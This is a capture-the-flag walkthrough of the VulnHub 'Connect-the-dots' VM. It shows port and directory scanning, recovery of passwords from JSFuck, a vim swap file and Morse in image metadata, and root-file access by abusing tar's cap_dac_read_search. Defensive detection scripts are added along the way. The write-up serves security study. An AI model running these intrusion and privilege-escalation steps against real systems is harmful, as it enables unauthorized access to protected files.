VulnHub machine: Connect-the-dots

Target VM: Connect The Dots: 1 ~ VulnHub

Goal: obtain user.txt (an ordinary user) and root.txt (the root user).

VM setup

After downloading the OVA, open and import it in VMware. Be sure to set the network adapter to the same network segment as your Kali machine (usually NAT).

Penetration test

Scan with nmap

└─# nmap -p- -sV -T4 192.168.5.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 11:11 CST
Nmap scan report for 192.168.5.128 (192.168.5.128)
Host is up (0.0017s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs_acl  3 (RPC #100227)
7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
33661/tcp open  nlockmgr 1-4 (RPC #100021)
34979/tcp open  mountd   1-3 (RPC #100005)
50387/tcp open  mountd   1-3 (RPC #100005)
55027/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:AC:33:1F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Port 80 is open, so there is a web site; run a directory scan against it.

└─# dirsearch -u "http://192.168.5.128/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt     

  _|. _ _  _  _  _ _|_    v0.4.1                                                                                                                                                                                   
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                            
                                                                                                                                                                                                                   
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520

Output File: /root/.dirsearch/reports/192.168.5.128/_21-09-04_23-00-33.txt

Error Log: /root/.dirsearch/logs/errors-21-09-04_23-00-33.log

Target: http://192.168.5.128/
                                                                                                                                                                                                                   
[23:00:33] Starting: 
[23:00:33] 301 -  315B  - /images  ->  http://192.168.5.128/images/
[23:00:34] 301 -  315B  - /manual  ->  http://192.168.5.128/manual/
[23:00:35] 301 -  319B  - /javascript  ->  http://192.168.5.128/javascript/
[23:00:51] 200 -    6KB - /backups                                
[23:01:01] 301 -  315B  - /mysite  ->  http://192.168.5.128/mysite/
[23:03:08] 403 -  301B  - /server-status                                                                                        
                                                                                                                                                                                                            
Task Completed   

Visiting http://192.168.5.128/mysite/ reveals that the file bootstrap.min.cs contains JSFuck.


After opening http://192.168.5.128/mysite/register.html, concatenate the fragments in the browser console with console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+b10).


Decode the resulting JSFuck.

Decoder site: http://codertab.com/JsUnFuck


You're smart enough to understand me. 
Here's your secret, TryToGuessThisNorris@2k19

We get TryToGuessThisNorris@2k19, which hints that we should try logging in as norris.
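The hidden payload above was only found by opening files by hand. As an added example (not code from the VM or this write-up), the scanner below flags JSFuck-style obfuscation in static web assets the way a defender reviewing a web root would: it looks for long runs made up solely of the six characters a JSFuck program consists of, and it also joins single-quoted string literals first, because a payload split across fragments such as b1..b10 keeps each individual run short. The sample inputs, the 200-character threshold and the function names are my own assumptions.

```python
"""Flag JSFuck-style obfuscation in web assets (added example, not the VM's code)."""
import re
from pathlib import Path

# A JSFuck program uses only these six characters. Ordinary minified JS also
# contains short runs of them ("!![]", "(+[])"), so only long runs are flagged.
JSFUCK_CHARS = r"[\[\]()!+]"


def find_jsfuck_runs(text: str, min_len: int = 200) -> list:
    """Return (offset, length) for every run of at least min_len JSFuck characters."""
    pattern = re.compile(JSFUCK_CHARS + "{%d,}" % min_len)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(text)]


def join_string_literals(text: str) -> str:
    """Concatenate every single-quoted string literal in the text.

    The VM split its payload into ten string fragments that are concatenated
    in the browser, so each fragment alone may be shorter than min_len.
    """
    return "".join(re.findall(r"'([^'\\]*)'", text))


def scan_text(text: str, min_len: int = 200) -> dict:
    """Scan raw text and the joined literals; report both kinds of hit."""
    raw = find_jsfuck_runs(text, min_len)
    joined = find_jsfuck_runs(join_string_literals(text), min_len)
    return {"raw_runs": raw, "joined_literal_runs": joined,
            "suspicious": bool(raw or joined)}


def scan_webroot(root: Path, suffixes=(".js", ".css", ".html", ".htm", ".cs")) -> dict:
    """Walk a web root and return {path: scan result} for suspicious files."""
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            result = scan_text(path.read_text(errors="replace"))
            if result["suspicious"]:
                findings[str(path)] = result
    return findings


# Constructed samples (not the VM's files): a payload split into ten fragments
# like the b1..b10 variables in the write-up, and clean minified code.
SAMPLE_SPLIT = "\n".join(
    "var b%d = '%s';" % (i, "[]+!![]+(![]+[])" * 5) for i in range(1, 11)
)
SAMPLE_CLEAN = "(function(){return !![]&&(+[]+1)})();"

if __name__ == "__main__":
    print("split payload:", scan_text(SAMPLE_SPLIT))
    print("clean code:  ", scan_text(SAMPLE_CLEAN))
```

For the split sample no single fragment reaches the threshold, so raw_runs is empty, but the joined literals form one 800-character run and the file is flagged; the clean snippet is not.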

└─# ssh norris@192.168.5.128 -p 7822
norris@192.168.5.128's password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

Last login: Sun Sep  5 07:13:23 2021 from 192.168.5.129
norris@sirrom:~$ 

Get user.txt

norris@sirrom:~$ cat user.txt 
2c2836a138c0e7f7529aa0764a6414d0

There is an ftp folder in the current directory.

norris@sirrom:~$ ls
ftp  user.txt

norris@sirrom:~$ cd ftp/files
norris@sirrom:~/ftp/files$ ls -al
total 972
drwxr-xr-x 2 norris norris    4096 Oct 11  2019 .
dr-xr-xr-x 3 nobody nogroup   4096 Oct 11  2019 ..
-r-------- 1 norris norris    6301 Oct 11  2019 backups.bak
-r-------- 1 norris norris   39610 Oct 11  2019 game.jpg.bak
-r-------- 1 norris norris      29 Oct 11  2019 hits.txt.bak
-r-------- 1 norris norris  932659 Oct 11  2019 m.gif.bak

Log in via FTP

└─# ftp 192.168.5.128
Connected to 192.168.5.128.
220 Welcome to Heaven!
Name (192.168.5.128:root): norris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 11  2019 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--------    1 1001     1001         6301 Oct 11  2019 backups.bak
-r--------    1 1001     1001        39610 Oct 11  2019 game.jpg.bak
-r--------    1 1001     1001           29 Oct 11  2019 hits.txt.bak
-r--------    1 1001     1001       932659 Oct 11  2019 m.gif.bak
226 Directory send OK.
ftp> get game.jpg.bak
local: game.jpg.bak remote: game.jpg.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.jpg.bak (39610 bytes).
226 Transfer complete.
39610 bytes received in 0.00 secs (116.5896 MB/s)
└─# exiftool game.jpg.bak
ExifTool Version Number         : 12.16
File Name                       : game.jpg.bak
Directory                       : .
File Size                       : 39 KiB
File Modification Date/Time     : 2021:09:05 11:24:39+08:00
File Access Date/Time           : 2021:09:05 11:24:39+08:00
File Inode Change Date/Time     : 2021:09:05 11:24:39+08:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 192
Y Resolution                    : 192
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Comment                         : .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
Image Width                     : 712
Image Height                    : 350
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 712x350
Megapixels                      : 0.249

Decode the Morse code

Decoder site: https://gchq.github.io/CyberChef/
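The exiftool and CyberChef steps can be reproduced offline. The following is an added example, not code from the VM or this write-up: it walks the JPEG marker segments to pull out the COM (0xFFFE) comment, then decodes Morse, treating the seven-dot token "......." that this image uses as a word separator (the standard "/" and triple space are accepted too). The Morse text is the Comment value shown above; the minimal JPEG built around it, the Morse table and the function names are my own.

```python
"""Extract a JPEG COM segment and decode it as Morse (added example)."""
import re
import struct
from typing import Optional

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    ".-.-.-": ".", "--..--": ",", "..--..": "?", ".----.": "'", "-....-": "-",
    "-..-.": "/", ".--.-.": "@", "---...": ":",
}
# "......." is not a Morse character; this image uses it between words.
WORD_SEPARATORS = {".......", "/"}


def jpeg_comment(data: bytes) -> Optional[str]:
    """Return the first COM segment payload, or None if there is none."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI, or SOS: only image data follows
            return None
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # standalone markers, no length
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if marker == 0xFE:                  # COM: length counts itself, not the marker
            return data[pos + 4:pos + 2 + length].decode("latin-1")
        pos += 2 + length
    return None


def decode_morse(code: str) -> str:
    """Decode Morse text; unknown tokens become '[?]' instead of raising."""
    normalized = re.sub(r" {3,}", " / ", code.strip())
    words, current = [], []
    for token in normalized.split():
        if token in WORD_SEPARATORS:
            words.append("".join(current))
            current = []
        else:
            current.append(MORSE.get(token, "[?]"))
    words.append("".join(current))
    return " ".join(w for w in words if w)


def build_jpeg_with_comment(comment: str) -> bytes:
    """Constructed minimal JPEG: SOI, one COM segment, EOI (test input only)."""
    body = comment.encode("latin-1")
    return b"\xff\xd8\xff\xfe" + struct.pack(">H", len(body) + 2) + body + b"\xff\xd9"


# The Comment value exiftool printed for game.jpg.bak (copied from the write-up).
GAME_JPG_COMMENT = (
    ".... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... "
    "-- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... "
    "..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... "
    ".-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... "
    ".... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... "
    "-- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... "
    "--- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... "
    ".- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... "
    "..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... "
    "-.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... "
    ".-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... "
    "-... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... "
    "-.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... "
    ".. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... "
    "- --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... "
    ".----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... "
    ".--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-"
)


def decode_game_jpg() -> str:
    """End to end: build the JPEG, pull the comment, decode the Morse."""
    return decode_morse(jpeg_comment(build_jpeg_with_comment(GAME_JPG_COMMENT)))


if __name__ == "__main__":
    print(decode_game_jpg())
```

The parser stops at SOS because metadata segments precede the entropy-coded data; for a real file, pass `Path("game.jpg.bak").read_bytes()` to `jpeg_comment` instead of the constructed bytes.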


The decoded message contains the keyword 'SECRETFILE'. The target is found in /var/www/html; the .swp file is a swap file left behind when the editor was interrupted, for example by a sudden power loss or Ctrl+Z.

norris@sirrom:/var/www/html$ ls -al                                                                                                                                                                                 
total 368                                                                                                                                                                                                           
drwxr-xr-x 4 root     root       4096 Oct 11  2019 .                                                                                                                                                                
drwxr-xr-x 3 root     root       4096 Oct 11  2019 ..                                                                                                                                                               
-rw-r--r-- 1 www-data www-data   6301 Oct 11  2019 backups                                                                                                                                                          
-rw-r--r-- 1 www-data www-data    325 Oct 11  2019 backups.html                                                                                                                                                     
-rw-r--r-- 1 www-data www-data  78635 Oct 10  2019 bootstrap.bundle.min.js                                                                                                                                          
-rw-r--r-- 1 www-data www-data 155758 Oct 10  2019 bootstrap.min.css
-rw-r--r-- 1 www-data www-data     44 Oct 11  2019 hits.txt
drwxr-xr-x 2 www-data www-data   4096 Oct 11  2019 images
-rw-r--r-- 1 www-data www-data   2186 Oct 11  2019 index.htm
-rw-r--r-- 1 www-data www-data   1964 Oct 11  2019 index.html
-rw-r--r-- 1 www-data www-data  71037 Oct 10  2019 jquery.slim.min.js
-rw-r--r-- 1 www-data www-data    879 Oct 11  2019 landing.css
drwxr-xr-x 2 www-data www-data   4096 Oct 11  2019 mysite
-rw-r--r-- 1 www-data www-data     99 Oct 11  2019 secretfile
-rw------- 1 www-data www-data  12288 Oct 11  2019 .secretfile.swp

Download this file on Kali

└─# wget http://192.168.5.128/.secretfile.swp                                          
--2021-09-05 10:40:48--  http://192.168.5.128/.secretfile.swp
正在连接 192.168.5.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:12288 (12K)
正在保存至: “.secretfile.swp”

.secretfile.swp                                      100%[======================================================================================================================>]  12.00K  --.-KB/s  用时 0s      

2021-09-05 10:40:48 (212 MB/s) - 已保存 “.secretfile.swp” [12288/12288])

Use strings to view the printable strings in the file

└─# strings .secretfile.swp                                                                                                                                                                                   127 ⨯
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"! 
blehguessme090 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..

We obtain a password: blehguessme090
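The root cause here is an editor swap file served straight out of the web root. As an added example (not code from the VM or this write-up), the scanner below finds such leftovers by name (.swp, .swo, .bak, trailing ~ and similar) and by content (the "b0VIM" magic that strings printed above), and reads the identifying fields of a vim swap file using the block0 layout from vim's memline.c: a 2-byte id, a 10-byte version, four 4-byte integers, then a 40-byte user name, a 40-byte host name and the original file name. The temporary web root it builds, the fake swap file and all function names are my own.

```python
"""Find editor artifacts in a web root and read vim swap headers (added example)."""
import tempfile
from pathlib import Path

# Names editors leave behind; any of these inside a web root deserves review.
SUSPECT_SUFFIXES = (".swp", ".swo", ".swn", ".bak", ".orig", ".old", ".save", "~")
VIM_SWAP_MAGIC = b"b0VIM"


def looks_like_editor_artifact(name: str) -> bool:
    return name.endswith(SUSPECT_SUFFIXES)


def parse_vim_swap_header(data: bytes) -> dict:
    """Read version, user, host and original file name from a vim swap file.

    Offsets follow vim's struct block0 (memline.c): b0_id[2], b0_version[10],
    page size / mtime / inode / pid (4 bytes each), b0_uname[40], b0_hname[40],
    b0_fname[...]. Strings are NUL-terminated inside their fixed fields.
    """
    if not data.startswith(VIM_SWAP_MAGIC):
        raise ValueError("not a vim swap file")

    def cstring(start: int, size: int) -> str:
        return data[start:start + size].split(b"\0", 1)[0].decode("utf-8", "replace")

    return {
        "version": cstring(2, 10),
        "user": cstring(28, 40),
        "host": cstring(68, 40),
        "original_file": cstring(108, 898),
    }


def scan_webroot(root: Path) -> list:
    """Return one finding per suspicious file, with swap-header details if vim."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        by_name = looks_like_editor_artifact(path.name)
        by_magic = data.startswith(VIM_SWAP_MAGIC)
        if by_name or by_magic:
            finding = {"path": path.relative_to(root).as_posix(),
                       "by_name": by_name, "vim_swap": by_magic}
            if by_magic:
                finding["header"] = parse_vim_swap_header(data)
            findings.append(finding)
    return findings


def make_fake_swap(user: str, host: str, fname: str) -> bytes:
    """Constructed swap-file header in the block0 layout (test data, not the VM's file)."""
    buf = bytearray(1024)
    buf[0:9] = b"b0VIM 8.1"
    buf[28:28 + len(user)] = user.encode()
    buf[68:68 + len(host)] = host.encode()
    buf[108:108 + len(fname)] = fname.encode()
    return bytes(buf)


def demo() -> list:
    """Build a constructed web root shaped like the listing above and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html></html>")
        (root / "secretfile").write_text("placeholder, not the VM's content")
        (root / ".secretfile.swp").write_bytes(
            make_fake_swap("root", "sirrom", "/var/www/html/secretfile"))
        (root / "mysite").mkdir()
        (root / "mysite" / "register.html~").write_text("")
        return sorted(scan_webroot(root), key=lambda f: f["path"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Beyond removing the files, Apache 2.4 can refuse to serve them at all, for example with a `<FilesMatch "(\.swp|\.swo|\.bak|~)$">` block containing `Require all denied`, and the dirsearch-style listing above shows why the check matters: the swap file was reachable without any authentication.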

Together with the user morris, discovered via showmount, this password allows an SSH login.

└─# showmount -e 192.168.5.128      
Export list for 192.168.5.128:
/home/morris *


└─# ssh morris@192.168.5.128 -p 7822
morris@192.168.5.128's password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

Last login: Sun Sep  5 08:14:59 2021 from 192.168.5.129
morris@sirrom:~$ sudo -l
[sudo] password for morris: 
Sorry, user morris may not run sudo on sirrom.

But morris has the same privileges as norris, so we continue the following steps as norris.

Use getcap to look for exploitable commands. tar carries cap_dac_read_search, which bypasses file read-permission checks and directory read/execute-permission checks.

norris@sirrom:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep


Capabilities can be understood as splitting root's privileges into many parts that can be granted to ordinary users; each capability grants a different function. The corresponding command is getcap.

/sbin/getcap -r / 2>/dev/null

/sbin = system administration commands for the superuser; programs used by the system administrator live here
getcap -r = recursively list files whose capabilities were set with setcap
2> = redirect standard error; any error messages are sent there instead of being displayed
/dev/null = the Linux "trash can": anything written to it is discarded
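Reading getcap output by eye is how the tar finding above was made; as an added example (not code from the VM or this write-up), the audit below does the same for a whole listing and rates each capability, so that a DAC-bypassing one such as cap_dac_read_search on a general-purpose tool stands out from the expected ones like cap_net_raw on ping. It accepts both the older libcap output format shown above (`path = caps+ep`) and the newer one (`path caps=ep`). The severity sets and function names are my own assumptions; the sample input is the listing from this write-up.

```python
"""Rate file capabilities from `getcap -r /` output (added example)."""
import re

# Capabilities that bypass DAC or are effectively root: on a general-purpose
# binary any one of these lets a local user read or alter files it should not.
HIGH = {
    "cap_dac_read_search", "cap_dac_override", "cap_setuid", "cap_setgid",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_sys_rawio", "cap_setfcap",
}
# Powerful but scoped to one subsystem; review the binary that holds them.
MEDIUM = {"cap_net_admin", "cap_sys_chroot", "cap_mknod", "cap_sys_boot"}


def parse_getcap_line(line: str):
    """Split one getcap line into (path, [capability names])."""
    line = line.strip()
    if " = " in line:                       # older libcap: path = caps+ep
        path, spec = line.rsplit(" = ", 1)
    else:                                   # newer libcap: path caps=ep
        path, spec = line.rsplit(None, 1)
    names = re.split(r"[+=]", spec, maxsplit=1)[0]   # drop the e/p/i flag suffix
    return path, [c.strip().lower() for c in names.split(",") if c.strip()]


def audit(getcap_output: str) -> list:
    """One finding per (path, capability) with a severity of high/medium/low."""
    findings = []
    for raw in getcap_output.splitlines():
        if not raw.strip():
            continue
        path, caps = parse_getcap_line(raw)
        for cap in caps:
            severity = "high" if cap in HIGH else "medium" if cap in MEDIUM else "low"
            findings.append({"path": path, "capability": cap, "severity": severity})
    return findings


# The listing from the write-up (sample input, as printed by getcap on the VM).
GETCAP_OUTPUT = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
"""


def high_findings(getcap_output: str = GETCAP_OUTPUT) -> dict:
    """Map each path to the high-severity capabilities it holds."""
    out = {}
    for f in audit(getcap_output):
        if f["severity"] == "high":
            out.setdefault(f["path"], []).append(f["capability"])
    return out


if __name__ == "__main__":
    for f in audit(GETCAP_OUTPUT):
        print("%-6s %-22s %s" % (f["severity"], f["capability"], f["path"]))
```

On a real host, feed it `/sbin/getcap -r / 2>/dev/null` output; the remediation for a finding like tar is to drop the file capability with `setcap -r /usr/bin/tar`, since nothing in a normal tar workflow needs cap_dac_read_search.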

Use tar to archive the /root directory and obtain root.txt

norris@sirrom:~$ tar -zcvf root.tar.gz /root
tar: Removing leading `/' from member names
/root/
/root/root.txt
/root/.bashrc
/root/.gnupg/
/root/.gnupg/private-keys-v1.d/
/root/.bash_history
/root/.cache/
/root/.local/
/root/.local/share/
/root/.local/share/nano/
/root/.profile
norris@sirrom:~$ ls
ftp  root.tar.gz  user.txt
norris@sirrom:~$ tar -zxvf root.tar.gz 
root/
root/root.txt
root/.bashrc
root/.gnupg/
root/.gnupg/private-keys-v1.d/
root/.bash_history
root/.cache/
root/.local/
root/.local/share/
root/.local/share/nano/
root/.profile
norris@sirrom:~$ ls
ftp  root  root.tar.gz  user.txt
norris@sirrom:~$ cd root/
norris@sirrom:~/root$ ls
root.txt
norris@sirrom:~/root$ pwd
/home/norris/root
norris@sirrom:~/root$ cat root.txt 
8fc9376d961670ca10be270d52eda423

Notes

Without -p-, nmap will not discover port 7822.
